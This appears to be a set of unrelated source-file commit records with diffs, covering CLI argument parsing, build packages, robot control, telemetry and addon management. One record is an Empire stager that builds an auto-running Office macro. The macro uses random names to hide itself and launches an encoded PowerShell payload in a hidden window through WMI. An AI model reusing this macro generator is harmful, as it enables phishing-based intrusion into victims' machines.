default_arg_parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=_("coala is a simple COde AnaLysis Application. Its goal is "
"to make static code analysis easy and convenient for all "
"languages."))
default_arg_parser.add_argument('TARGETS',
nargs='*',
help=_("Sections to be executed exclusively."))
default_arg_parser.add_argument('-f',
'--files',
nargs='+',
metavar='FILE',
help=_('Files that should be checked'))
default_arg_parser.add_argument('-b',
'--bears',
nargs='+',
metavar='NAME',
help=_('Names of bears to use'))
BEAR_DIRS_HELP = _('Additional directories where bears may lie')
default_arg_parser.add_argument('-d',
'--bear-dirs',
nargs='+',
metavar='DIR',
help=BEAR_DIRS_HELP)
LOG_TYPE_HELP = _("Type of logging (console or any filename)")
default_arg_parser.add_argument('-l',
'--log-type',
nargs=1,
metavar='ENUM',
help=LOG_TYPE_HELP)
LOG_LEVEL_HELP = _("Enum('ERR','WARN','DEBUG') to set level of log output")
default_arg_parser.add_argument('-L',
'--log-level',
nargs=1,
choices=['ERR', 'WARN', 'DEBUG'],
metavar='ENUM',
help=LOG_LEVEL_HELP)
OUTPUT_HELP = _('Type of output (console or none)')
default_arg_parser.add_argument('-o',
'--output',
nargs=1,
metavar='FILE',
help=OUTPUT_HELP)
CONFIG_HELP = _('Configuration file to be used, defaults to .coafile')
default_arg_parser.add_argument('-c',
'--config',
nargs=1,
metavar='FILE',
help=CONFIG_HELP)
SAVE_HELP = _('Filename of file to be saved to, if provided with no arguments,'
' settings will be stored back to the file given by -c')
default_arg_parser.add_argument('-s',
'--save',
nargs='?',
const=True,
metavar='FILE',
help=SAVE_HELP)
SETTINGS_HELP = _('Arbitrary settings in the form of section.key=value')
default_arg_parser.add_argument('-S',
'--settings',
nargs='+',
metavar='SETTING',
help=SETTINGS_HELP)
JOB_COUNT_HELP = _('Number of processes to be allowed to run at once')
default_arg_parser.add_argument('-j',
'--job-count',
nargs=1,
type=int,
metavar='INT',
help=JOB_COUNT_HELP)
APPLY_HELP = _("Enum('YES','NO','ASK') to set whether to apply changes")
default_arg_parser.add_argument('-a',
'--apply-changes',
nargs=1,
choices=['YES', 'NO', 'ASK'],
metavar='ENUM',
help=APPLY_HELP)
|
Python
| 0
|
@@ -1598,15 +1598,20 @@
'ERR
+OR
','WARN
+ING
','D
@@ -1637,16 +1637,38 @@
of log
+%22%0A %22
output%22)
@@ -1843,16 +1843,18 @@
'ERR
+OR
', 'WARN
', '
@@ -1849,16 +1849,19 @@
', 'WARN
+ING
', 'DEBU
|
72e91e55d62f4fc3e947a37181590a0e31fe5e9b
|
fix LengthOfVari missing error
|
lib/stagers/windows/macro.py
|
lib/stagers/windows/macro.py
|
from lib.common import helpers
import random
import random, string
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Macro',
'Author': ['@enigma0x3', '@harmj0y'],
'Description': ('Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.'),
'Comments': [
'http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/'
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
},
'OutFile' : {
'Description' : 'File to output macro to, otherwise displayed on the screen.',
'Required' : False,
'Value' : '/tmp/macro'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
Str = ''.join(random.choice(string.letters) for i in range(LengthOfVari))
Method=''.join(random.choice(string.letters) for i in range(LengthOfVari))
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
chunks = list(helpers.chunks(launcher, 50))
payload = "\tDim "+Str+" As String\n"
payload += "\t"+Str+" = \"" + str(chunks[0]) + "\"\n"
for chunk in chunks[1:]:
payload += "\t"+Str+" = "+Str+" + \"" + str(chunk) + "\"\n"
macro = "Sub Auto_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro = "Sub AutoOpen()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Sub Document_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Public Function "+Method+"() As Variant\n"
macro += payload
macro += "\tConst HIDDEN_WINDOW = 0\n"
macro += "\tstrComputer = \".\"\n"
macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
macro += "End Function\n"
return macro
|
Python
| 0.000001
|
@@ -3286,28 +3286,57 @@
es)%0A
-
+LengthOfVari=random.randint(1,35)
%0A Str
|
8cf3e7a822517ba12abe72def6d4a2cd0180fb19
|
Fix autonomous mode merge
|
robot/robot/src/autonomous/main.py
|
robot/robot/src/autonomous/main.py
|
try:
import wpilib
except ImportError:
from pyfrc import wpilib
class main(object):
'''autonomous program'''
DEFAULT = True
MODE_NAME = "Tim's Mode"
def __init__ (self, components):
''' initialize'''
super().__init__()
self.drive = components['drive']
self.intake = components['intake']
self.catapult = components['catapult']
# number of seconds to drive forward, allow us to tune it via SmartDashboard
wpilib.SmartDashboard.PutNumber('AutoDriveTime', 1.4)
wpilib.SmartDashboard.PutNumber('AutoDriveSpeed', 0.5)
def on_enable(self):
'''these are called when autonomous starts'''
self.drive_time = wpilib.SmartDashboard.GetNumber('AutoDriveTime')
self.drive_speed = wpilib.SmartDashboard.GetNumber('AutoDriveSpeed')
print("Team 1418 autonomous code for 2014")
print("-> Drive time:", self.drive_time, "seconds")
print("-> Drive speed:", self.drive_speed)
#print("-> Battery voltage: %.02fv" % wpilib.DriverStation.GetInstance().GetBatteryVoltage())
def on_disable(self):
'''This function is called when autonomous mode is disabled'''
pass
def update(self, time_elapsed):
'''The actual autonomous program'''
# always pulldown
if time_elapsed > 0.3:
self.catapult.pulldown()
if time_elapsed < 0.3:
# Get the arm down so that we can winch
self.intake.armDown()
<<<<<<< HEAD
if time_elapsed > 0.5:
self.catapult.autowinch()
elif time_elapsed < 1.5:
=======
elif time_elapsed < 1.4:
>>>>>>> branch 'master' of https://github.com/frc1418/2014.git
# The arm is at least far enough down now that
# the winch won't hit it, start winching
self.intake.armDown()
elif time_elapsed < 2.0:
# We're letting the winch take its sweet time
pass
elif time_elapsed < 2.0 + self.drive_time:
# Drive slowly forward for N seconds
self.drive.move(0, self.drive_speed, 0)
elif time_elapsed < 2.0 + self.drive_time + 1.0:
# Finally, fire and keep firing for 1 seconds
self.catapult.launchNoSensor()
<<<<<<< HEAD
=======
>>>>>>> 907e2ebf9b7991b9ebf2ee093eefd40c2ccb1b98
|
Python
| 0.000083
|
@@ -1658,242 +1658,51 @@
wn()
-%0D%0A%3C%3C%3C%3C%3C%3C%3C HEAD%0A if time_elapsed %3E 0.5:%0D%0A self.catapult.autowinch()%0D%0A elif time_elapsed %3C 1.5:%0D%0A=======%0A %0D%0A elif time_elapsed %3C 1.4:%0D%0A%3E%3E%3E%3E%3E%3E%3E branch 'master' of https://github.com/frc1418/2014.git
+%0A %0D%0A elif time_elapsed %3C 1.4:
%0A
@@ -2332,118 +2332,5 @@
or()
-%0D%0A%3C%3C%3C%3C%3C%3C%3C HEAD%0A %0A=======%0A %0D%0A%0D%0A %0A%3E%3E%3E%3E%3E%3E%3E 907e2ebf9b7991b9ebf2ee093eefd40c2ccb1b98
%0A
|
c435f6039b344829380db4bf92f80ff4d5de8972
|
fixes scrolling_benchmark.
|
tools/telemetry/telemetry/core/chrome/android_platform_backend.py
|
tools/telemetry/telemetry/core/chrome/android_platform_backend.py
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import sys
from telemetry.core.chrome import platform
from telemetry.core.chrome import platform_backend
# Get build/android scripts into our path.
sys.path.append(
os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../../build/android')))
from pylib import perf_tests_helper # pylint: disable=F0401
from pylib import thermal_throttle # pylint: disable=F0401
try:
from pylib import surface_stats_collector # pylint: disable=F0401
except Exception:
surface_stats_collector = None
class AndroidPlatformBackend(platform_backend.PlatformBackend):
def __init__(self, adb, no_performance_mode):
super(AndroidPlatformBackend, self).__init__()
self._adb = adb
self._surface_stats_collector = None
self._perf_tests_setup = perf_tests_helper.PerfTestSetup(self._adb)
self._thermal_throttle = thermal_throttle.ThermalThrottle(self._adb)
self._no_performance_mode = no_performance_mode
self._raw_display_frame_rate_measurements = []
if self._no_performance_mode:
logging.warning('CPU governor will not be set!')
def IsRawDisplayFrameRateSupported(self):
return True
def StartRawDisplayFrameRateMeasurement(self):
assert not self._surface_stats_collector
self._surface_stats_collector = \
surface_stats_collector.SurfaceStatsCollector(self._adb)
self._surface_stats_collector.Start()
def StopRawDisplayFrameRateMeasurement(self):
self._surface_stats_collector.Stop()
for r in self._surface_stats_collector.GetResults():
self._raw_display_frame_rate_measurements.append(
platform.Platform.RawDisplayFrameRateMeasurement(
r.name, r.value, r.unit))
self._surface_stats_collector = None
def GetRawDisplayFrameRateMeasurements(self):
return self._raw_display_frame_rate_measurements
def SetFullPerformanceModeEnabled(self, enabled):
if self._no_performance_mode:
return
if enabled:
self._perf_tests_setup.SetUp()
else:
self._perf_tests_setup.TearDown()
def CanMonitorThermalThrottling(self):
return True
def IsThermallyThrottled(self):
return self._thermal_throttle.IsThrottled()
def HasBeenThermallyThrottled(self):
return self._thermal_throttle.HasBeenThrottled()
def GetSystemCommitCharge(self):
for line in self._adb.RunShellCommand('dumpsys meminfo', log_result=False):
if line.startswith('Total PSS: '):
return int(line.split()[2]) * 1024
return 0
def GetMemoryStats(self, pid):
memory_usage = self._adb.GetMemoryUsageForPid(pid)[0]
return {'ProportionalSetSize': memory_usage['Pss'] * 1024,
'PrivateDirty': memory_usage['Private_Dirty'] * 1024}
def GetIOStats(self, pid):
return {}
def GetChildPids(self, pid):
child_pids = []
ps = self._adb.RunShellCommand('ps', log_result=False)[1:]
for line in ps:
data = line.split()
curr_pid = data[1]
curr_name = data[-1]
if int(curr_pid) == pid:
name = curr_name
for line in ps:
data = line.split()
curr_pid = data[1]
curr_name = data[-1]
if curr_name.startswith(name) and curr_name != name:
child_pids.append(int(curr_pid))
break
return child_pids
|
Python
| 0.999861
|
@@ -1978,27 +1978,72 @@
lf):%0A ret
-urn
+ = self._raw_display_frame_rate_measurements%0A
self._raw_d
@@ -2072,16 +2072,36 @@
urements
+ = %5B%5D%0A return ret
%0A%0A def
|
7bfb4a2d7daf5baaa3eb88f1d85edd813ea2aaed
|
enable gobject option in cairo (#21404)
|
var/spack/repos/builtin/packages/gobject-introspection/package.py
|
var/spack/repos/builtin/packages/gobject-introspection/package.py
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import spack.hooks.sbang as sbang
class GobjectIntrospection(Package):
"""The GObject Introspection is used to describe the program APIs and
collect them in a uniform, machine readable format.Cairo is a 2D graphics
library with support for multiple output"""
homepage = "https://wiki.gnome.org/Projects/GObjectIntrospection"
url = "http://ftp.gnome.org/pub/gnome/sources/gobject-introspection/1.49/gobject-introspection-1.49.2.tar.xz"
version('1.56.1', sha256='5b2875ccff99ff7baab63a34b67f8c920def240e178ff50add809e267d9ea24b')
version('1.49.2', sha256='73d59470ba1a546b293f54d023fd09cca03a951005745d86d586b9e3a8dde9ac')
version('1.48.0', sha256='fa275aaccdbfc91ec0bc9a6fd0562051acdba731e7d584b64a277fec60e75877')
depends_on("glib@2.49.2:", when="@1.49.2:")
# version 1.48.0 build fails with glib 2.49.4
depends_on("glib@2.48.1", when="@1.48.0")
depends_on("python")
depends_on("cairo")
depends_on("bison", type="build")
depends_on("flex", type="build")
depends_on("pkgconfig", type="build")
# GobjectIntrospection does not build with sed from darwin:
depends_on('sed', when='platform=darwin', type='build')
# This package creates several scripts from
# toosl/g-ir-tool-template.in. In their original form these
# scripts end up with a sbang line like
#
# `#!/usr/bin/env /path/to/spack/python`.
#
# These scripts are generated and then used as part of the build
# (other packages also use the scripts after they've been
# installed).
#
# The path to the spack python can become too long. Because these
# tools are used as part of the build, the normal hook that fixes
# this problem can't help us.
# This package fixes the problem in two steps:
# - it rewrites the g-ir-tool-template so that its sbang line
# refers directly to spack's python (filter_file step below); and
# - it patches the Makefile.in so that the generated Makefile has an
# extra sed expression in its TOOL_SUBSTITUTION that results in
# an `#!/bin/bash /path/to/spack/bin/sbang` unconditionally being
# inserted into the scripts as they're generated.
patch("sbang.patch")
def url_for_version(self, version):
url = 'http://ftp.gnome.org/pub/gnome/sources/gobject-introspection/{0}/gobject-introspection-{1}.tar.xz'
return url.format(version.up_to(2), version)
def setup_run_environment(self, env):
env.prepend_path("GI_TYPELIB_PATH",
join_path(self.prefix.lib, 'girepository-1.0'))
def setup_dependent_build_environment(self, env, dependent_spec):
env.prepend_path("XDG_DATA_DIRS", self.prefix.share)
env.prepend_path("GI_TYPELIB_PATH",
join_path(self.prefix.lib, 'girepository-1.0'))
def setup_dependent_run_environment(self, env, dependent_spec):
env.prepend_path("XDG_DATA_DIRS", self.prefix.share)
env.prepend_path("GI_TYPELIB_PATH",
join_path(self.prefix.lib, 'girepository-1.0'))
def install(self, spec, prefix):
configure("--prefix=%s" % prefix)
# we need to filter this file to avoid an overly long hashbang line
filter_file('#!/usr/bin/env @PYTHON@', '#!@PYTHON@',
'tools/g-ir-tool-template.in')
make()
make("install")
def setup_build_environment(self, env):
env.set('SPACK_SBANG', sbang.sbang_install_path())
@property
def parallel(self):
return not self.spec.satisfies('%fj')
|
Python
| 0
|
@@ -1157,16 +1157,24 @@
n(%22cairo
++gobject
%22)%0A d
|
9963642c1cc05fb6d9dfe397b9ed811d4f7e3d26
|
add 4.6.1 and 3.10.1 (#24701)
|
var/spack/repos/builtin/packages/py-importlib-metadata/package.py
|
var/spack/repos/builtin/packages/py-importlib-metadata/package.py
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyImportlibMetadata(PythonPackage):
"""Read metadata from Python packages."""
homepage = "https://importlib-metadata.readthedocs.io/"
pypi = "importlib_metadata/importlib_metadata-1.2.0.tar.gz"
version('3.10.0', sha256='c9db46394197244adf2f0b08ec5bc3cf16757e9590b02af1fca085c16c0d600a')
version('2.0.0', sha256='77a540690e24b0305878c37ffd421785a6f7e53c8b5720d211b211de8d0e95da')
version('1.2.0', sha256='41e688146d000891f32b1669e8573c57e39e5060e7f5f647aa617cd9a9568278')
version('0.23', sha256='aa18d7378b00b40847790e7c27e11673d7fed219354109d0e7b9e5b25dc3ad26')
version('0.19', sha256='23d3d873e008a513952355379d93cbcab874c58f4f034ff657c7a87422fa64e8')
version('0.18', sha256='cb6ee23b46173539939964df59d3d72c3e0c1b5d54b84f1d8a7e912fe43612db')
depends_on('python@3.6:', type=('build', 'run'), when='@3:')
depends_on('python@2.7:2.8,3.5:', type=('build', 'run'))
depends_on('py-setuptools', type='build')
depends_on('py-setuptools-scm', type='build')
depends_on('py-setuptools-scm@3.4.1:+toml', type='build', when='@3:')
depends_on('py-zipp@0.5:', type=('build', 'run'))
depends_on('py-pathlib2', when='^python@:2', type=('build', 'run'))
depends_on('py-contextlib2', when='^python@:2', type=('build', 'run'))
depends_on('py-configparser@3.5:', when='^python@:2', type=('build', 'run'))
depends_on('py-typing-extensions@3.6.4:', type=('build', 'run'), when='@3: ^python@:3.7.999')
|
Python
| 0
|
@@ -427,16 +427,209 @@
ar.gz%22%0A%0A
+ version('4.6.1', sha256='079ada16b7fc30dfbb5d13399a5113110dab1aa7c2bc62f66af75f0b717c8cac')%0A version('3.10.1', sha256='c9356b657de65c53744046fa8f7358afe0714a1af7d570c00c3835c2d724a7c1')%0A
vers
|
a2749190545a6765a479777b1ea97d2f9090593f
|
clean up project config a bit
|
jailscraper/project_config.py
|
jailscraper/project_config.py
|
"""ProPublica specific configuration and utilities"""
import os
PROJECT_SLUG = 'cookcountyjail2'
INMATE_URL_TEMPLATE = 'http://www2.cookcountysheriff.org/search2/details.asp?jailnumber={0}'
"""Sets the maximum jail number to scan for by default.
If the subsequent jail number returns a 2xx status code, it will be incremented
until an error code is sent. [@TODO: Not implemented, see
https://github.com/propublica/cookcountyjail2/issues/9]
"""
MAX_DEFAULT_JAIL_NUMBER = 400
def get_secrets():
"""Get all environment variables associated with this project.
Reads environment variables that start with PROJECT_SLUG, strips out the slug
and adds them to a dictionary.
"""
secrets = {}
for k, v in os.environ.items():
if k.startswith(PROJECT_SLUG):
new_k = k[len(PROJECT_SLUG) + 1:]
secrets[new_k] = v
return secrets
SECRETS = get_secrets()
S3_BUCKET = SECRETS['S3_BUCKET']
TARGET = SECRETS['TARGET']
S3_URL = 's3://{0}/{1}'.format(SECRETS['S3_BUCKET'], SECRETS['TARGET'])
|
Python
| 0
|
@@ -58,424 +58,53 @@
ort
-os%0A%0APROJECT_SLUG = 'cookcountyjail2'%0AINMATE_URL_TEMPLATE = 'http://www2.cookcountysheriff.org/search2/details.asp?jailnumber=%7B0%7D'%0A%0A%22%22%22Sets the maximum jail number to scan for by default.%0A%0AIf the subsequent jail number returns a 2xx status code, it will be incremented%0Auntil an error code is sent. %5B@TODO: Not implemented, see%0Ahttps://github.com/propublica/cookcountyjail2/issues/9%5D%0A%22%22%22%0AMAX_DEFAULT_JAIL_NUMBER = 400%0A
+boto3%0Aimport botocore%0Aimport os%0A%0A%0A### Helpers
%0A%0Ade
|
dde62362955ca4b10f3c1fec4e3b7777b03141f5
|
remove ContextDict since std has ChainMap
|
jasily/collection/__init__.py
|
jasily/collection/__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017~2999 - cologler <skyoflw@gmail.com>
# ----------
#
# ----------
from collections import KeysView, ValuesView, ItemsView, MutableMapping
_NO_VALUE = object()
class ContextDict(MutableMapping):
'''context dict can override base_dict.'''
def __init__(self, base_dict: dict, *args, **kwargs):
if base_dict is None:
raise ValueError('base_dict cannot be None')
self._base_dict = base_dict
self._data = dict(*args, **kwargs) # data maybe not empty.
def __setitem__(self, key, value):
self._data[key] = value
def __delitem__(self, key):
del self._data[key]
def __getitem__(self, key):
value = self._data.get(key, _NO_VALUE)
if value is _NO_VALUE:
value = self._base_dict[key]
return value
def __iter__(self):
for k in self._data:
yield k
for k in self._base_dict:
if k not in self._data:
yield k
def __len__(self):
# base dict may change, so we cannot cache the size.
d1 = self._data
d2 = self._base_dict
d1_len = len(d1)
d2_len = len(d2)
if d1_len > d2_len: # ensure d1 < d2
d1, d2 = d2, d1
total_size = d1_len + d2_len
for k in d1:
if k in d2:
total_size -= 1
return total_size
def scope(self):
'''create a scoped dict.'''
return ContextDict(self)
def __enter__(self):
'''return a new context dict.'''
return self.scope()
def __exit__(self, *args):
pass
|
Python
| 0.000013
|
@@ -130,1538 +130,4 @@
---%0A
-%0Afrom collections import KeysView, ValuesView, ItemsView, MutableMapping%0A%0A_NO_VALUE = object()%0A%0Aclass ContextDict(MutableMapping):%0A '''context dict can override base_dict.'''%0A%0A def __init__(self, base_dict: dict, *args, **kwargs):%0A if base_dict is None:%0A raise ValueError('base_dict cannot be None')%0A%0A self._base_dict = base_dict%0A self._data = dict(*args, **kwargs) # data maybe not empty.%0A%0A def __setitem__(self, key, value):%0A self._data%5Bkey%5D = value%0A%0A def __delitem__(self, key):%0A del self._data%5Bkey%5D%0A%0A def __getitem__(self, key):%0A value = self._data.get(key, _NO_VALUE)%0A if value is _NO_VALUE:%0A value = self._base_dict%5Bkey%5D%0A return value%0A%0A def __iter__(self):%0A for k in self._data:%0A yield k%0A for k in self._base_dict:%0A if k not in self._data:%0A yield k%0A%0A def __len__(self):%0A # base dict may change, so we cannot cache the size.%0A d1 = self._data%0A d2 = self._base_dict%0A d1_len = len(d1)%0A d2_len = len(d2)%0A if d1_len %3E d2_len: # ensure d1 %3C d2%0A d1, d2 = d2, d1%0A total_size = d1_len + d2_len%0A for k in d1:%0A if k in d2:%0A total_size -= 1%0A return total_size%0A%0A def scope(self):%0A '''create a scoped dict.'''%0A return ContextDict(self)%0A%0A def __enter__(self):%0A '''return a new context dict.'''%0A return self.scope()%0A%0A def __exit__(self, *args):%0A pass%0A
|
a7c94079f3fde0550d65eabbadb575fddbb31939
|
Add vm_util
|
perfkitbenchmarker/linux_packages/aerospike_server.py
|
perfkitbenchmarker/linux_packages/aerospike_server.py
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing aerospike server installation and cleanup functions."""
import logging
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker.linux_packages import INSTALL_DIR
FLAGS = flags.FLAGS
GIT_REPO = 'https://github.com/aerospike/aerospike-server.git'
GIT_TAG = '3.7.5'
AEROSPIKE_DIR = '%s/aerospike-server' % INSTALL_DIR
AEROSPIKE_CONF_PATH = '%s/as/etc/aerospike_dev.conf' % AEROSPIKE_DIR
AEROSPIKE_DEFAULT_TELNET_PORT = 3003
MEMORY = 'memory'
DISK = 'disk'
flags.DEFINE_enum('aerospike_storage_type', MEMORY, [MEMORY, DISK],
'The type of storage to use for Aerospike data. The type of '
'disk is controlled by the "data_disk_type" flag.')
flags.DEFINE_integer('aerospike_replication_factor', 1,
'Replication factor for aerospike server.')
flags.DEFINE_integer('aerospike_transaction_threads_per_queue', 4,
'Number of threads per transaction queue.')
def _Install(vm):
"""Installs the Aerospike server on the VM."""
vm.Install('build_tools')
vm.Install('lua5_1')
vm.Install('openssl')
vm.RemoteCommand('git clone {0} {1}'.format(GIT_REPO, AEROSPIKE_DIR))
vm.RemoteCommand('cd {0} && git checkout {1} && git submodule update --init '
'&& make'.format(AEROSPIKE_DIR, GIT_TAG))
def YumInstall(vm):
"""Installs the memtier package on the VM."""
_Install(vm)
def AptInstall(vm):
"""Installs the memtier package on the VM."""
_Install(vm)
@vm_util.Retry(poll_interval=5, timeout=300,
retryable_exceptions=(errors.Resource.RetryableCreationError))
def _WaitForServerUp(server):
"""Block until the Aerospike server is up and responsive.
Will timeout after 5 minutes, and raise an exception. Before the timeout
expires any exceptions are caught and the status check is retried.
We check the status of the server by connecting to Aerospike's out
of band telnet management port and issue a 'status' command. This should
return 'ok' if the server is ready. Per the aerospike docs, this always
returns 'ok', i.e. if the server is not up the connection will fail or we
would get no response at all.
Args:
server: VirtualMachine Aerospike has been installed on.
Raises:
errors.Resource.RetryableCreationError when response is not 'ok' or if there
is an error connecting to the telnet port or otherwise running the remote
check command.
"""
address = server.internal_ip
port = AEROSPIKE_DEFAULT_TELNET_PORT
logging.info("Trying to connect to Aerospike at %s:%s" % (address, port))
try:
out, _ = server.RemoteCommand(
'(echo -e "status\n" ; sleep 1)| netcat %s %s' % (address, port))
if out.startswith('ok'):
logging.info("Aerospike server status is OK. Server up and running.")
return
except errors.VirtualMachine.RemoteCommandError as e:
raise errors.Resource.RetryableCreationError(
"Aerospike server not up yet: %s." % str(e))
else:
raise errors.Resource.RetryableCreationError(
"Aerospike server not up yet. Expected 'ok' but got '%s'." % out)
def ConfigureAndStart(server, seed_node_ips=None):
"""Prepare the Aerospike server on a VM.
Args:
server: VirtualMachine to install and start Aerospike on.
seed_node_ips: internal IP addresses of seed nodes in the cluster.
Leave unspecified for a single-node deployment.
"""
server.Install('aerospike_server')
seed_node_ips = seed_node_ips or [server.internal_ip]
if FLAGS.aerospike_storage_type == DISK:
devices = [scratch_disk.GetDevicePath()
for scratch_disk in server.scratch_disks]
else:
devices = []
server.RenderTemplate(
data.ResourcePath('aerospike.conf.j2'), AEROSPIKE_CONF_PATH,
{'devices': devices,
'memory_size': int(server.total_memory_kb * 0.8),
'seed_addresses': seed_node_ips,
'transaction_threads_per_queue':
FLAGS.aerospike_transaction_threads_per_queue,
'replication_factor': FLAGS.aerospike_replication_factor})
for scratch_disk in server.scratch_disks:
server.RemoteCommand('sudo umount %s' % scratch_disk.mount_point)
server.RemoteCommand('cd %s && make init' % AEROSPIKE_DIR)
server.RemoteCommand('cd %s; nohup sudo make start &> /dev/null &' %
AEROSPIKE_DIR)
_WaitForServerUp(server)
logging.info("Aerospike server configured and started.")
def Uninstall(vm):
vm.RemoteCommand('rm -rf %s' % AEROSPIKE_DIR)
|
Python
| 0
|
@@ -810,16 +810,55 @@
t flags%0A
+from perfkitbenchmarker import vm_util%0A
from per
|
544c009b9cd0fa7d540e955567b533d6bc87f155
|
Fix rewrite config to addon on restart (#71)
|
hassio/addons/__init__.py
|
hassio/addons/__init__.py
|
"""Init file for HassIO addons."""
import asyncio
import logging
import shutil
from .data import AddonsData
from .git import AddonsRepoHassIO, AddonsRepoCustom
from ..const import STATE_STOPPED, STATE_STARTED
from ..dock.addon import DockerAddon
_LOGGER = logging.getLogger(__name__)
class AddonManager(AddonsData):
"""Manage addons inside HassIO."""
def __init__(self, config, loop, dock):
"""Initialize docker base wrapper."""
super().__init__(config)
self.loop = loop
self.dock = dock
self.repositories = []
self.dockers = {}
async def prepare(self, arch):
"""Startup addon management."""
self.arch = arch
# init hassio repository
self.repositories.append(AddonsRepoHassIO(self.config, self.loop))
# init custom repositories
for url in self.config.addons_repositories:
self.repositories.append(
AddonsRepoCustom(self.config, self.loop, url))
# load addon repository
tasks = [addon.load() for addon in self.repositories]
if tasks:
await asyncio.wait(tasks, loop=self.loop)
# read data from repositories
self.read_data_from_repositories()
self.merge_update_config()
# load installed addons
for addon in self.list_installed:
self.dockers[addon] = DockerAddon(
self.config, self.loop, self.dock, self, addon)
await self.dockers[addon].attach()
async def add_git_repository(self, url):
"""Add a new custom repository."""
if url in self.config.addons_repositories:
_LOGGER.warning("Repository already exists %s", url)
return False
repo = AddonsRepoCustom(self.config, self.loop, url)
if not await repo.load():
_LOGGER.error("Can't load from repository %s", url)
return False
self.config.addons_repositories = url
self.repositories.append(repo)
return True
def drop_git_repository(self, url):
"""Remove a custom repository."""
for repo in self.repositories:
if repo.url == url:
self.repositories.remove(repo)
self.config.drop_addon_repository(url)
repo.remove()
return True
return False
async def reload(self):
"""Update addons from repo and reload list."""
tasks = [addon.pull() for addon in self.repositories]
if not tasks:
return
await asyncio.wait(tasks, loop=self.loop)
# read data from repositories
self.read_data_from_repositories()
self.merge_update_config()
# remove stalled addons
for addon in self.list_detached:
_LOGGER.warning("Dedicated addon '%s' found!", addon)
async def auto_boot(self, start_type):
"""Boot addons with mode auto."""
boot_list = self.list_startup(start_type)
tasks = [self.start(addon) for addon in boot_list]
_LOGGER.info("Startup %s run %d addons", start_type, len(tasks))
if tasks:
await asyncio.wait(tasks, loop=self.loop)
async def install(self, addon, version=None):
"""Install a addon."""
if not self.exists_addon(addon):
_LOGGER.error("Addon %s not exists for install", addon)
return False
if self.arch not in self.get_arch(addon):
_LOGGER.error("Addon %s not supported on %s", addon, self.arch)
return False
if self.is_installed(addon):
_LOGGER.error("Addon %s is already installed", addon)
return False
if not self.path_data(addon).is_dir():
_LOGGER.info("Create Home-Assistant addon data folder %s",
self.path_data(addon))
self.path_data(addon).mkdir()
addon_docker = DockerAddon(
self.config, self.loop, self.dock, self, addon)
version = version or self.get_last_version(addon)
if not await addon_docker.install(version):
return False
self.dockers[addon] = addon_docker
self.set_addon_install(addon, version)
return True
async def uninstall(self, addon):
"""Remove a addon."""
if not self.is_installed(addon):
_LOGGER.error("Addon %s is already uninstalled", addon)
return False
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
if not await self.dockers[addon].remove():
return False
if self.path_data(addon).is_dir():
_LOGGER.info("Remove Home-Assistant addon data folder %s",
self.path_data(addon))
shutil.rmtree(str(self.path_data(addon)))
self.dockers.pop(addon)
self.set_addon_uninstall(addon)
return True
